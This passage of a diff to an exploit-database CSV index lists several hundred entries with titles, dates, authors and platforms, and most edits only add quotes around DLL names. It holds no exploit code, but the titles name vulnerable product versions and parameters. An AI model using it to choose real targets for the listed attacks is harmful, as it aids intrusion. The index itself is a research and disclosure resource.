DOM Property Overrides Code Execution",2005-05-16,moz_bug_r_a4,multiple,remote,0 25671,platforms/php/webapps/25671.txt,"NPDS 4.8/5.0 - comments.php thold Parameter SQL Injection",2005-05-16,NoSP,php,webapps,0 @@ -22904,7 +22904,7 @@ id,file,description,date,author,platform,type,port 25711,platforms/hardware/dos/25711.txt,"Sony Ericsson P900 Beamer - Malformed File Name Handling Denial of Service",2005-05-26,"Marek Bialoglowy",hardware,dos,0 25712,platforms/windows/dos/25712.txt,"SIEMENS Solid Edge ST4/ST5 SEListCtrlX ActiveX - SetItemReadOnly Arbitrary Memory Rewrite Remote Code Execution",2013-05-26,rgod,windows,dos,0 25713,platforms/windows/remote/25713.txt,"SIEMENS Solid Edge ST4/ST5 WebPartHelper ActiveX - RFMSsvs!JShellExecuteEx Remote Code Execution",2013-05-26,rgod,windows,remote,0 -25714,platforms/windows/dos/25714.txt,"SAS Integration Technologies Client 9.31_M1 (SASspk.dll) - Stack Based Overflow",2013-05-26,LiquidWorm,windows,dos,0 +25714,platforms/windows/dos/25714.txt,"SAS Integration Technologies Client 9.31_M1 'SASspk.dll' - Stack Based Overflow",2013-05-26,LiquidWorm,windows,dos,0 25715,platforms/hardware/webapps/25715.py,"HP LaserJet Pro P1606dn - Webadmin Password Reset",2013-05-26,m3tamantra,hardware,webapps,0 25716,platforms/php/webapps/25716.py,"AVE.CMS 2.09 - (index.php module Parameter) Blind SQL Injection",2013-05-26,mr.pr0n,php,webapps,0 25718,platforms/hardware/local/25718.txt,"Sony Playstation 3 (PS3) 4.31 - Save Game Preview SFO File Handling Local Command Execution",2013-05-26,Vulnerability-Lab,hardware,local,0 @@ -22925,7 +22925,7 @@ id,file,description,date,author,platform,type,port 25734,platforms/php/webapps/25734.txt,"BookReview 1.0 - add_classification.htm isbn Parameter Cross-Site Scripting",2005-05-26,Lostmon,php,webapps,0 25735,platforms/php/webapps/25735.txt,"BookReview 1.0 - suggest_review.htm node Parameter Cross-Site Scripting",2005-05-26,Lostmon,php,webapps,0 25736,platforms/hardware/dos/25736.txt,"Nokia 9500 - vCard Viewer Remote Denial of Service",2005-05-26,"Marek Bialoglowy",hardware,dos,0 -25737,platforms/windows/dos/25737.txt,"Microsoft Windows 98SE - User32.dll Icon Handling Denial of Service",2005-05-26,klistas,windows,dos,0 +25737,platforms/windows/dos/25737.txt,"Microsoft Windows 98SE - 'User32.dll' Icon Handling Denial of Service",2005-05-26,klistas,windows,dos,0 25738,platforms/jsp/webapps/25738.txt,"BEA WebLogic 7.0/8.1 - Administration Console LoginForm.jsp Cross-Site Scripting",2005-05-27,"Team SHATTER",jsp,webapps,0 25739,platforms/jsp/webapps/25739.txt,"BEA WebLogic 7.0/8.1 - Administration Console Error Page Cross-Site Scripting",2005-05-27,"Team SHATTER",jsp,webapps,0 25740,platforms/php/webapps/25740.txt,"JAWS Glossary 0.4/0.5 - Cross-Site Scripting",2005-05-27,Nah,php,webapps,0 @@ -23175,7 +23175,7 @@ id,file,description,date,author,platform,type,port 25976,platforms/hardware/webapps/25976.txt,"DS3 - Authentication Server - Multiple Vulnerabilities",2013-06-05,"Pedro Andujar",hardware,webapps,0 25977,platforms/jsp/webapps/25977.txt,"Imperva SecureSphere Operations Manager 9.0.0.5 - Multiple Vulnerabilities",2013-06-05,"Pedro Andujar",jsp,webapps,0 25978,platforms/hardware/webapps/25978.txt,"Netgear DGN1000 / DGN2200 - Multiple Vulnerabilities",2013-06-05,"Roberto Paleari",hardware,webapps,80 -25979,platforms/windows/remote/25979.rb,"Oracle WebCenter Content - CheckOutAndOpen.dll ActiveX Remote Code Execution (Metasploit)",2013-06-05,Metasploit,windows,remote,0 +25979,platforms/windows/remote/25979.rb,"Oracle WebCenter Content - 'CheckOutAndOpen.dll' ActiveX Remote Code Execution (Metasploit)",2013-06-05,Metasploit,windows,remote,0 25980,platforms/multiple/remote/25980.rb,"Apache Struts - includeParams Remote Code Execution (Metasploit)",2013-06-05,Metasploit,multiple,remote,8080 25981,platforms/asp/webapps/25981.txt,"Hosting Controller 6.1 - Multiple SQL Injections",2005-07-13,"Soroush Dalili",asp,webapps,0 25982,platforms/cfm/webapps/25982.txt,"Simple Message Board 2.0 beta1 - Forum.cfm Cross-Site Scripting",2005-07-14,rUnViRuS,cfm,webapps,0 @@ -23367,7 +23367,7 @@ id,file,description,date,author,platform,type,port 26164,platforms/php/webapps/26164.txt,"PHPTB Topic Board 2.0 - dev_o.php absolutepath Parameter Remote File Inclusion",2005-08-17,"Filip Groszynski",php,webapps,0 26165,platforms/php/webapps/26165.txt,"PHPTB Topic Board 2.0 - file_o.php absolutepath Parameter Remote File Inclusion",2005-08-17,"Filip Groszynski",php,webapps,0 26166,platforms/php/webapps/26166.txt,"PHPTB Topic Board 2.0 - tech_o.php absolutepath Parameter Remote File Inclusion",2005-08-17,"Filip Groszynski",php,webapps,0 -26167,platforms/windows/remote/26167.pl,"Microsoft Visual Studio .NET - msdds.dll Remote Code Execution",2005-08-17,anonymous,windows,remote,0 +26167,platforms/windows/remote/26167.pl,"Microsoft Visual Studio .NET - 'msdds.dll' Remote Code Execution",2005-08-17,anonymous,windows,remote,0 26168,platforms/hardware/remote/26168.txt,"Juniper NetScreen 5.0 - VPN 'Username' Enumeration",2005-08-18,"Roy Hills",hardware,remote,0 26169,platforms/php/webapps/26169.txt,"W-Agora 4.2 - Site Parameter Directory Traversal",2005-08-18,matrix_killer,php,webapps,0 26170,platforms/php/webapps/26170.txt,"ATutor 1.5.1 - 'login.php' course Parameter Cross-Site Scripting",2005-08-18,matrix_killer,php,webapps,0 @@ -23506,7 +23506,7 @@ id,file,description,date,author,platform,type,port 26316,platforms/php/webapps/26316.php,"imacs CMS 0.3.0 - Unrestricted Arbitrary File Upload",2013-06-19,"CWH Underground",php,webapps,0 26330,platforms/multiple/remote/26330.txt,"Oracle HTML DB 1.5/1.6 - wwv_flow.accept p_t02 Parameter Cross-Site Scripting",2005-10-07,Red-Database-Security,multiple,remote,0 26331,platforms/multiple/dos/26331.txt,"Oracle 9.0 iSQL*Plus TLS Listener - Remote Denial of Service",2005-10-07,"Alexander Kornbrust",multiple,dos,0 -26318,platforms/hardware/remote/26318.py,"TP-Link PS110U Print Server TL - Sensitive Information Enumeration",2013-06-19,SANTHO,hardware,remote,0 +26318,platforms/hardware/remote/26318.py,"TP-Link PS110U Print Server TL - Sensitive Information Enumeration",2013-06-19,SANTHO,hardware,remote,0 26319,platforms/php/webapps/26319.txt,"Monkey CMS - Multiple Vulnerabilities",2013-06-19,"Yashar shahinzadeh_ Mormoroth",php,webapps,0 26328,platforms/php/webapps/26328.txt,"Utopia News Pro 1.1.3 - footer.php Multiple Parameter Cross-Site Scripting",2005-10-07,rgod,php,webapps,0 26329,platforms/multiple/remote/26329.txt,"Oracle HTML DB 1.5/1.6 - f p Parameter Cross-Site Scripting",2005-10-07,Red-Database-Security,multiple,remote,0 @@ -23633,7 +23633,7 @@ id,file,description,date,author,platform,type,port 26449,platforms/php/webapps/26449.txt,"e107 Advanced Medal System Plugin - SQL Injection",2013-06-26,"Life Wasted",php,webapps,0 26450,platforms/windows/dos/26450.pl,"Baby FTP Server 1.24 - Denial of Service",2013-06-26,Chako,windows,dos,21 26451,platforms/linux/local/26451.rb,"ZPanel zsudo - Privilege Escalation (Metasploit)",2013-06-26,Metasploit,linux,local,0 -26452,platforms/win_x86/local/26452.rb,"Novell Client 2 SP3 - nicm.sys Privilege Escalation (Metasploit)",2013-06-26,Metasploit,win_x86,local,0 +26452,platforms/win_x86/local/26452.rb,"Novell Client 2 SP3 - 'nicm.sys' Privilege Escalation (Metasploit)",2013-06-26,Metasploit,win_x86,local,0 26453,platforms/php/webapps/26453.py,"PHP-Charts 1.0 - (index.php type Parameter) Remote Code Execution",2013-06-26,infodox,php,webapps,0 26454,platforms/freebsd/local/26454.rb,"FreeBSD 9 - Address Space Manipulation Privilege Escalation (Metasploit)",2013-06-26,Metasploit,freebsd,local,0 26455,platforms/php/webapps/26455.txt,"VUBB - 'index.php' Cross-Site Scripting",2005-11-01,"Alireza Hassani",php,webapps,0 @@ -24499,7 +24499,7 @@ id,file,description,date,author,platform,type,port 27314,platforms/php/webapps/27314.txt,"DCI-Taskeen 1.03 - cat.php Multiple Parameter SQL Injection",2006-02-25,Linux_Drox,php,webapps,0 27315,platforms/php/webapps/27315.txt,"RiteCMS 1.0.0 - Multiple Vulnerabilities",2013-08-03,"Yashar shahinzadeh",php,webapps,0 27316,platforms/windows/local/27316.py,"Easy LAN Folder Share 3.2.0.100 - Buffer Overflow (SEH)",2013-08-03,sagi-,windows,local,0 -27317,platforms/windows/dos/27317.txt,"StarUML - WinGraphviz.dll ActiveX Buffer Overflow",2013-08-03,d3b4g,windows,dos,0 +27317,platforms/windows/dos/27317.txt,"StarUML - 'WinGraphviz.dll' ActiveX Buffer Overflow",2013-08-03,d3b4g,windows,dos,0 27318,platforms/php/webapps/27318.txt,"PHP-Nuke 7.8 - Mainfile.php SQL Injection",2006-02-25,waraxe,php,webapps,0 27319,platforms/hardware/remote/27319.txt,"Thomson SpeedTouch 500 Series - NewUser Function 31 Variable Persistent User Creation",2006-02-25,"Preben Nylokken",hardware,remote,0 27320,platforms/hardware/remote/27320.txt,"Thomson SpeedTouch 500 Series - LocalNetwork Page name Parameter Cross-Site Scripting",2006-02-25,"Preben Nylokken",hardware,remote,0 @@ -24762,7 +24762,7 @@ id,file,description,date,author,platform,type,port 27806,platforms/windows/remote/27806.txt,"BankTown ActiveX Control 1.4.2.51817/1.5.2.50209 - Remote Buffer Overflow",2006-05-03,"Gyu Tae",windows,remote,0 27605,platforms/php/webapps/27605.txt,"Alibaba Clone Tritanium Version - 'news_desc.html' SQL Injection",2013-08-15,IRAQ_JAGUAR,php,webapps,0 27606,platforms/windows/remote/27606.rb,"Intrasrv 1.0 - Buffer Overflow (Metasploit)",2013-08-15,Metasploit,windows,remote,80 -27607,platforms/windows/remote/27607.rb,"MiniWeb (Build 300) - Arbitrary File Upload (Metasploit)",2013-08-15,Metasploit,windows,remote,8000 +27607,platforms/windows/remote/27607.rb,"MiniWeb 300 - Arbitrary File Upload (Metasploit)",2013-08-15,Metasploit,windows,remote,8000 27608,platforms/windows/remote/27608.rb,"Ultra Mini HTTPD - Stack Buffer Overflow (Metasploit)",2013-08-15,Metasploit,windows,remote,80 27609,platforms/windows/local/27609.rb,"Chasys Draw IES - Buffer Overflow (Metasploit)",2013-08-15,Metasploit,windows,local,0 27610,platforms/php/remote/27610.rb,"Joomla! Component Media Manager - Arbitrary File Upload (Metasploit)",2013-08-15,Metasploit,php,remote,80 @@ -25222,7 +25222,7 @@ id,file,description,date,author,platform,type,port 28096,platforms/php/webapps/28096.txt,"SoftBiz Dating Script 1.0 - news_desc.php id Parameter SQL Injection",2006-06-22,"EllipSiS Security",php,webapps,0 28097,platforms/php/webapps/28097.txt,"Dating Agent 4.7.1 - Multiple Input Validation Vulnerabilities",2006-06-22,"EllipSiS Security",php,webapps,0 28098,platforms/php/webapps/28098.txt,"PHP Blue Dragon CMS 2.9.1 - Multiple Remote File Inclusion",2006-06-22,Shm,php,webapps,0 -28099,platforms/windows/dos/28099.txt,"Yahoo! Messenger 7.0/7.5 - jscript.dll Non-ASCII Character Denial of Service",2006-06-23,"Ivan Ivan",windows,dos,0 +28099,platforms/windows/dos/28099.txt,"Yahoo! Messenger 7.0/7.5 - 'jscript.dll' Non-ASCII Character Denial of Service",2006-06-23,"Ivan Ivan",windows,dos,0 28100,platforms/cfm/dos/28100.txt,"BlueDragon Server 6.2.1 - '.cfm' Denial of Service",2006-06-23,"Tan Chew Keong",cfm,dos,0 28101,platforms/php/webapps/28101.txt,"Custom Dating Biz 1.0 - Multiple Input Validation Vulnerabilities",2006-06-24,Luny,php,webapps,0 28102,platforms/php/webapps/28102.txt,"Winged Gallery 1.0 - Thumb.php Cross-Site Scripting",2006-06-24,Luny,php,webapps,0 @@ -25343,7 +25343,7 @@ id,file,description,date,author,platform,type,port 28220,platforms/linux/dos/28220.txt,"KDE Konqueror 3.5.x - ReplaceChild Denial of Service",2006-07-14,hdm,linux,dos,0 28222,platforms/windows/dos/28222.txt,"Microsoft Works 8.0 Spreadsheet - Multiple Vulnerabilities",2006-06-14,"Benjamin Franz",windows,dos,0 28223,platforms/php/webapps/28223.txt,"Subberz Lite - UserFunc Remote File Inclusion",2006-07-14,"Chironex Fleckeri",php,webapps,0 -28224,platforms/windows/remote/28224.c,"Microsoft PowerPoint 2003 - mso.dll PPT Processing Unspecified Code Execution",2006-07-14,"naveed afzal",windows,remote,0 +28224,platforms/windows/remote/28224.c,"Microsoft PowerPoint 2003 - 'mso.dll' .PPT Processing Unspecified Code Execution",2006-07-14,"naveed afzal",windows,remote,0 28225,platforms/windows/remote/28225.c,"Microsoft PowerPoint 2003 - powerpnt.exe Unspecified Issue",2006-07-14,"naveed afzal",windows,remote,0 28226,platforms/windows/remote/28226.c,"Microsoft PowerPoint 2003 - '.ppt' File Closure Memory Corruption",2006-07-14,"naveed afzal",windows,remote,0 28227,platforms/windows/dos/28227.txt,"Microsoft Windows 2000/XP - Registry Access Local Denial of Service",2006-07-15,"David Matousek",windows,dos,0 @@ -25351,7 +25351,7 @@ id,file,description,date,author,platform,type,port 28229,platforms/php/webapps/28229.txt,"VisNetic Mail Server 8.3.5 - Multiple File Inclusion",2006-07-17,"Tan Chew Keong",php,webapps,0 28230,platforms/hardware/dos/28230.txt,"Multiple D-Link Routers - UPNP Buffer Overflow",2006-07-17,"Barnaby Jack",hardware,dos,0 28231,platforms/php/webapps/28231.txt,"ListMessenger 0.9.3 - LM_Path Parameter Remote File Inclusion",2006-07-17,xoron,php,webapps,0 -28232,platforms/windows/dos/28232.txt,"Agnitum Outpost Firewall 3.5.631 - FiltNT.SYS Local Denial of Service",2006-07-17,"Bipin Gautam",windows,dos,0 +28232,platforms/windows/dos/28232.txt,"Agnitum Outpost Firewall 3.5.631 - 'FiltNT.SYS' Local Denial of Service",2006-07-17,"Bipin Gautam",windows,dos,0 28233,platforms/php/webapps/28233.txt,"Calendar Module 1.5.7 For Mambo - Com_Calendar.php Remote File Inclusion",2006-07-17,Matdhule,php,webapps,0 28234,platforms/linux/dos/28234.txt,"MySQL 4.x/5.x - Server Date_Format Denial of Service",2006-07-18,"Christian Hammers",linux,dos,0 28235,platforms/windows/remote/28235.c,"RARLAB WinRAR 3.x - LHA Filename Handling Buffer Overflow",2006-07-18,"Ryan Smith",windows,remote,0 @@ -25501,9 +25501,9 @@ id,file,description,date,author,platform,type,port 28384,platforms/linux/dos/28384.txt,"Libmusicbrainz 2.0.2/2.1.x - Multiple Buffer Overflow Vulnerabilities",2006-08-14,"Luigi Auriemma",linux,dos,0 28385,platforms/asp/webapps/28385.txt,"BlaBla 4U - Multiple Cross-Site Scripting Vulnerabilities",2006-08-14,Vampire,asp,webapps,0 28386,platforms/linux/dos/28386.txt,"Linux-HA Heartbeat 2.0.6 - Remote Denial of Service",2006-08-13,"Yan Rong Ge",linux,dos,0 -28387,platforms/windows/dos/28387.html,"Microsoft Internet Explorer 6 - IMSKDIC.dll Denial of Service",2006-08-15,nop,windows,dos,0 +28387,platforms/windows/dos/28387.html,"Microsoft Internet Explorer 6 - 'IMSKDIC.dll' Denial of Service",2006-08-15,nop,windows,dos,0 28388,platforms/php/webapps/28388.txt,"PHP-Nuke 2.0 AutoHTML Module - Local File Inclusion",2006-08-15,MosT3mR,php,webapps,0 -28389,platforms/windows/dos/28389.html,"Microsoft Internet Explorer 6 - MSOE.dll Denial of Service",2006-08-15,nop,windows,dos,0 +28389,platforms/windows/dos/28389.html,"Microsoft Internet Explorer 6 - 'MSOE.dll' Denial of Service",2006-08-15,nop,windows,dos,0 28390,platforms/php/webapps/28390.txt,"Lizge 20 - 'index.php' Multiple Remote File Inclusion",2006-08-15,Crackers_Child,php,webapps,0 28391,platforms/linux/dos/28391.html,"Mozilla Firefox 1.x - XML Handler Race Condition Memory Corruption",2006-08-15,"Michal Zalewski",linux,dos,0 28392,platforms/php/webapps/28392.txt,"Zen Cart Web Shopping Cart 1.x - autoload_func.php autoLoadConfig[999][0][loadFile] Parameter Remote File Inclusion",2006-08-15,"James Bercegay",php,webapps,0 @@ -25512,7 +25512,7 @@ id,file,description,date,author,platform,type,port 28397,platforms/linux/remote/28397.sh,"GNU BinUtils 2.1x - GAS Buffer Overflow",2006-08-17,"Tavis Ormandy",linux,remote,0 28398,platforms/linux/remote/28398.txt,"MySQL 4/5 - SUID Routine Miscalculation Arbitrary DML Statement Execution",2006-08-17,"Michal Prokopiuk",linux,remote,0 28399,platforms/php/webapps/28399.txt,"CubeCart 3.0.x - Multiple Input Validation Vulnerabilities",2006-08-17,rgod,php,webapps,0 -28400,platforms/windows/remote/28400.html,"Microsoft Internet Explorer 6 - TSUserEX.dll ActiveX Control Memory Corruption",2006-08-17,nop,windows,remote,0 +28400,platforms/windows/remote/28400.html,"Microsoft Internet Explorer 6 - 'TSUserEX.dll' ActiveX Control Memory Corruption",2006-08-17,nop,windows,remote,0 28401,platforms/windows/dos/28401.html,"Microsoft Internet Explorer 6 - Visual Studio COM Object Instantiation Denial of Service",2006-08-08,XSec,windows,dos,0 40378,platforms/linux/webapps/40378.txt,"Open-Xchange App Suite 7.8.2 - Cross-Site Scripting",2016-09-13,"Jakub A>>oczek",linux,webapps,0 28402,platforms/php/webapps/28402.txt,"Blog:CMS 4.1 - Dir_Plugins Parameter Multiple Remote File Inclusion",2006-08-17,Drago84,php,webapps,0 @@ -26176,8 +26176,8 @@ id,file,description,date,author,platform,type,port 29221,platforms/cgi/webapps/29221.txt,"BlueSocket BSC 2100 5.0/5.1 - Admin.pl Cross-Site Scripting",2006-12-04,"Jesus Olmos Gonzalez",cgi,webapps,0 29222,platforms/php/webapps/29222.txt,"Cerberus Helpdesk 2.x - Spellwin.php Cross-Site Scripting",2006-12-04,"En Douli",php,webapps,0 29068,platforms/php/webapps/29068.txt,"WordPress Theme Area53 - Arbitrary File Upload",2013-10-19,"Byakuya Kouta",php,webapps,80 -29069,platforms/windows/local/29069.c,"Computer Associates Personal Firewall 9.0 - HIPS Driver (kmxfw.sys) Privilege Escalation",2006-11-16,"Ruben Santamarta ",windows,local,0 -29070,platforms/windows/local/29070.c,"Computer Associates Personal Firewall 9.0 - HIPS Driver (kmxstart.sys) Privilege Escalation",2006-11-16,"Ruben Santamarta ",windows,local,0 +29069,platforms/windows/local/29069.c,"Computer Associates Personal Firewall 9.0 - HIPS Driver 'kmxfw.sys' Privilege Escalation",2006-11-16,"Ruben Santamarta ",windows,local,0 +29070,platforms/windows/local/29070.c,"Computer Associates Personal Firewall 9.0 - HIPS Driver 'kmxstart.sys' Privilege Escalation",2006-11-16,"Ruben Santamarta ",windows,local,0 29071,platforms/php/webapps/29071.txt,"CPanel 10 - DNSlook.HTML Cross-Site Scripting",2006-11-17,"Aria-Security Team",php,webapps,0 29072,platforms/php/webapps/29072.txt,"PHP Upload Tool 1.0 - Arbitrary File Upload / Directory Traversal",2006-11-17,"Craig Heffner",php,webapps,0 29073,platforms/asp/webapps/29073.txt,"ASPCart 4.5 - Multiple SQL Injections",2006-11-17,"laurent gaffie",asp,webapps,0 @@ -26232,7 +26232,7 @@ id,file,description,date,author,platform,type,port 29122,platforms/asp/webapps/29122.txt,"Enthrallweb eHomes - compareHomes.asp Multiple Parameter SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 29123,platforms/asp/webapps/29123.txt,"Enthrallweb eHomes - result.asp Multiple Parameter SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 29124,platforms/asp/webapps/29124.txt,"Enthrallweb eHomes - result.asp Multiple Parameter Cross-Site Scripting",2006-11-20,"laurent gaffie",asp,webapps,0 -29125,platforms/windows/local/29125.txt,"Avira Internet Security - avipbb.sys Filter Bypass / Privilege Escalation",2013-10-22,"Ahmad Moghimi",windows,local,0 +29125,platforms/windows/local/29125.txt,"Avira Internet Security - 'avipbb.sys' Filter Bypass / Privilege Escalation",2013-10-22,"Ahmad Moghimi",windows,local,0 29126,platforms/asp/webapps/29126.txt,"Gnews Publisher - Multiple SQL Injections",2006-11-20,"Aria-Security Team",asp,webapps,0 29127,platforms/hardware/remote/29127.rb,"D-Link DIR-605L - Captcha Handling Buffer Overflow (Metasploit)",2013-10-22,Metasploit,hardware,remote,80 29128,platforms/php/webapps/29128.txt,"Vikingboard 0.1.2 - admin.php act Parameter Traversal Arbitrary File Access",2006-11-20,"laurent gaffie",php,webapps,0 @@ -26254,7 +26254,7 @@ id,file,description,date,author,platform,type,port 29143,platforms/asp/webapps/29143.txt,"Klf-Realty 2.0 - detail.asp property_id Parameter SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 29144,platforms/osx/dos/29144.txt,"Apple Mac OSX 10.4.8 - UDIF Disk Image Remote Denial of Service",2006-11-20,LMH,osx,dos,0 29145,platforms/php/webapps/29145.txt,"Wabbit PHP Gallery 0.9 - Dir Parameter Directory Traversal",2006-11-20,the_Edit0r,php,webapps,0 -29146,platforms/windows/remote/29146.c,"Novell Client 4.91 - NWSPOOL.dll Remote Buffer Overflow",2006-11-21,"Andres Tarasco Acuna",windows,remote,0 +29146,platforms/windows/remote/29146.c,"Novell Client 4.91 - 'NWSPOOL.dll' Remote Buffer Overflow",2006-11-21,"Andres Tarasco Acuna",windows,remote,0 34371,platforms/windows/local/34371.py,"BlazeDVD Pro 7.0 - '.plf' Buffer Overflow (SEH)",2014-08-20,metacom,windows,local,0 29161,platforms/osx/dos/29161.txt,"Apple Mac OSX 10.4.8 - UDTO Disk Image Remote Denial of Service",2006-11-21,LMH,osx,dos,0 29162,platforms/php/webapps/29162.txt,"My Little Weblog 2006.11.21 - Weblog.php Cross-Site Scripting",2006-11-21,the_Edit0r,php,webapps,0 @@ -26262,7 +26262,7 @@ id,file,description,date,author,platform,type,port 29218,platforms/php/webapps/29218.txt,"PHPNews 1.3 - Link_Temp.php Multiple Cross-Site Scripting Vulnerabilities",2006-12-02,Detefix,php,webapps,0 29219,platforms/asp/webapps/29219.txt,"DUdownload 1.0/1.1 - detail.asp Multiple Parameter SQL Injection",2006-12-02,"Aria-Security Team",asp,webapps,0 29220,platforms/asp/webapps/29220.html,"Metyus Okul Yonetim 1.0 - Sistemi Uye_giris_islem.asp SQL Injection",2006-12-04,ShaFuck31,asp,webapps,0 -29164,platforms/windows/dos/29164.cpp,"FortKnox Personal Firewall 9.0.305.0 / 10.0.305.0 - Kernel Driver (fortknoxfw.sys) Memory Corruption",2013-10-24,"Arash Allebrahim",windows,dos,0 +29164,platforms/windows/dos/29164.cpp,"FortKnox Personal Firewall 9.0.305.0 / 10.0.305.0 - Kernel Driver 'fortknoxfw.sys' Memory Corruption",2013-10-24,"Arash Allebrahim",windows,dos,0 29165,platforms/php/webapps/29165.txt,"PMOS Help Desk 2.3 - ticketview.php Multiple Parameter Cross-Site Scripting",2006-11-22,SwEET-DeViL,php,webapps,0 29166,platforms/php/webapps/29166.txt,"PMOS Help Desk 2.3 - ticket.php email Parameter Cross-Site Scripting",2006-11-22,SwEET-DeViL,php,webapps,0 29167,platforms/windows/remote/29167.rb,"Netgear WG311v1 Wireless Driver 2.3.1.10 - SSID Heap Buffer Overflow",2006-11-22,"Laurent Butti",windows,remote,0 @@ -26452,7 +26452,7 @@ id,file,description,date,author,platform,type,port 29371,platforms/multiple/remote/29371.txt,"Oracle 10g - Portal Key Parameter Cross-Site Scripting",2006-12-29,"Pham Duc Hai",multiple,remote,0 29372,platforms/php/webapps/29372.txt,"Mobilelib Gold - Multiple Cross-Site Scripting Vulnerabilities",2006-12-29,"viP HaCKEr",php,webapps,0 29373,platforms/asp/webapps/29373.txt,"Spooky 2.7 - login/register.asp SQL Injection",2006-12-30,Doz,asp,webapps,0 -29374,platforms/windows/local/29374.txt,"Kerio Personal Firewall 4.3 - IPHLPAPI.dll Privilege Escalation",2007-01-01,"Matousec Transparent security",windows,local,0 +29374,platforms/windows/local/29374.txt,"Kerio Personal Firewall 4.3 - 'IPHLPAPI.dll' Privilege Escalation",2007-01-01,"Matousec Transparent security",windows,local,0 29377,platforms/php/webapps/29377.txt,"AShop Deluxe 4.5 - ashop/catalogue.php Multiple Parameter Cross-Site Scripting",2007-01-02,"Hackers Center Security",php,webapps,0 29378,platforms/php/webapps/29378.txt,"AShop Deluxe 4.5 - ashop/basket.php cat Parameter Cross-Site Scripting",2007-01-02,"Hackers Center Security",php,webapps,0 29379,platforms/php/webapps/29379.txt,"AShop Deluxe 4.5 - ashop/search.php SearchString Parameter Cross-Site Scripting",2007-01-02,"Hackers Center Security",php,webapps,0 @@ -26592,7 +26592,7 @@ id,file,description,date,author,platform,type,port 30041,platforms/php/webapps/30041.txt,"Jetbox CMS 2.1 - 'view/search/' path Parameter Cross-Site Scripting",2007-05-15,"Mikhail Markin",php,webapps,0 30042,platforms/php/webapps/30042.txt,"Jetbox CMS 2.1 - view/supplynews Multiple Parameter Cross-Site Scripting",2007-05-15,"Mikhail Markin",php,webapps,0 30043,platforms/linux/remote/30043.txt,"Sun Java JDK 1.x - Multiple Vulnerabilities",2007-05-16,"Chris Evans",linux,remote,0 -30045,platforms/windows/remote/30045.html,"PrecisionID Barcode - PrecisionID_Barcode.dll ActiveX 1.9 Control Arbitrary File Overwrite",2007-05-16,shinnai,windows,remote,0 +30045,platforms/windows/remote/30045.html,"PrecisionID Barcode - 'PrecisionID_Barcode.dll' ActiveX 1.9 Control Arbitrary File Overwrite",2007-05-16,shinnai,windows,remote,0 30046,platforms/windows/dos/30046.py,"Computer Associates BrightStor ARCserve Backup 11.5 - mediasvr caloggerd Denial of Service Vulnerabilities",2007-05-16,"M. Shirk",windows,dos,0 30047,platforms/php/webapps/30047.txt,"vBulletin 3.6.6 - calendar.php HTML Injection",2007-05-16,"laurent gaffie",php,webapps,0 30048,platforms/asp/webapps/30048.html,"VP-ASP Shopping Cart 6.50 - ShopContent.asp Cross-Site Scripting",2007-05-17,"John Martinelli",asp,webapps,0 @@ -26610,7 +26610,7 @@ id,file,description,date,author,platform,type,port 30016,platforms/windows/remote/30016.txt,"Adobe RoboHelp - Frameset-7.HTML Cross-Site Scripting",2007-05-08,"Michael Domberg",windows,remote,0 30017,platforms/unix/local/30017.sh,"HP Tru64 5.0.1 - DOP Command Privilege Escalation",2007-05-08,"Daniele Calore",unix,local,0 30018,platforms/linux/remote/30018.py,"Python 2.5 - PyLocale_strxfrm Function Remote Information Leak",2007-05-08,"Piotr Engelking",linux,remote,0 -30019,platforms/windows/remote/30019.c,"CA Multiple Products Console Server and InoCore.dll - Remote Code Execution Vulnerabilities",2007-05-09,binagres,windows,remote,0 +30019,platforms/windows/remote/30019.c,"CA Multiple Products Console Server and 'InoCore.dll' - Remote Code Execution Vulnerabilities",2007-05-09,binagres,windows,remote,0 30020,platforms/linux/dos/30020.txt,"MySQL 5.0.x - IF Query Handling Remote Denial of Service",2013-12-04,"Neil Kettle",linux,dos,0 30021,platforms/solaris/local/30021.txt,"Sun Microsystems Solaris SRSEXEC 3.2.x - Arbitrary File Read Local Information Disclosure",2007-05-10,anonymous,solaris,local,0 30022,platforms/php/webapps/30022.txt,"PHP Multi User Randomizer 2006.09.13 - Configure_Plugin.TPL.php Cross-Site Scripting",2007-05-10,the_Edit0r,php,webapps,0 @@ -26646,7 +26646,7 @@ id,file,description,date,author,platform,type,port 29535,platforms/osx/dos/29535.txt,"Telestream Flip4Mac - 'WMV' File Remote Memory Corruption",2007-01-27,kf,osx,dos,0 29536,platforms/windows/dos/29536.html,"Microsoft Internet Explorer 5.0.1 - Multiple ActiveX Controls Denial of Service Vulnerabilities",2007-01-29,"Alexander Sotirov",windows,dos,0 29537,platforms/php/webapps/29537.txt,"MDPro 1.0.76 - 'index.php' SQL Injection",2007-01-27,adexior,php,webapps,0 -29538,platforms/windows/remote/29538.c,"SSC DiskAccess NFS Client - DAPCNFSD.dll Stack Buffer Overflow",2007-01-29,"Andres Tarasco Acuna",windows,remote,0 +29538,platforms/windows/remote/29538.c,"SSC DiskAccess NFS Client - 'DAPCNFSD.dll' Stack Buffer Overflow",2007-01-29,"Andres Tarasco Acuna",windows,remote,0 29539,platforms/php/webapps/29539.txt,"EncapsCMS 0.3.6 - 'common_foot.php' Remote File Inclusion",2007-01-30,Tr_ZiNDaN,php,webapps,0 29540,platforms/solaris/dos/29540.c,"Sun Solaris 10 - ICMP Unspecified Remote Denial of Service",2007-01-30,kcope,solaris,dos,0 29677,platforms/php/webapps/29677.txt,"Audins Audiens 3.3 - setup.php PATH_INFO Parameter Cross-Site Scripting",2007-02-26,r00t,php,webapps,0 @@ -26676,7 +26676,7 @@ id,file,description,date,author,platform,type,port 29555,platforms/osx/dos/29555.txt,"Apple Mac OSX 10.4.x - Safari window.console.log Format String",2007-01-30,LMH,osx,dos,0 29556,platforms/php/webapps/29556.txt,"OpenEMR 2.8.2 - Import_XML.php Remote File Inclusion",2007-01-31,trzindan,php,webapps,0 29557,platforms/php/webapps/29557.txt,"OpenEMR 2.8.2 - Login_Frame.php Cross-Site Scripting",2007-01-31,"Michael Melewski",php,webapps,0 -29558,platforms/windows/dos/29558.c,"Comodo Firewall 2.3.6 - CMDMon.SYS Multiple Denial of Service Vulnerabilities",2007-02-01,"Matousec Transparent security",windows,dos,0 +29558,platforms/windows/dos/29558.c,"Comodo Firewall 2.3.6 - 'CMDMon.SYS' Multiple Denial of Service Vulnerabilities",2007-02-01,"Matousec Transparent security",windows,dos,0 29559,platforms/php/webapps/29559.txt,"EasyMoblog 0.5.1 - Multiple Input Validation Vulnerabilities",2007-02-02,"Tal Argoni",php,webapps,0 29560,platforms/php/webapps/29560.txt,"PHPProbid 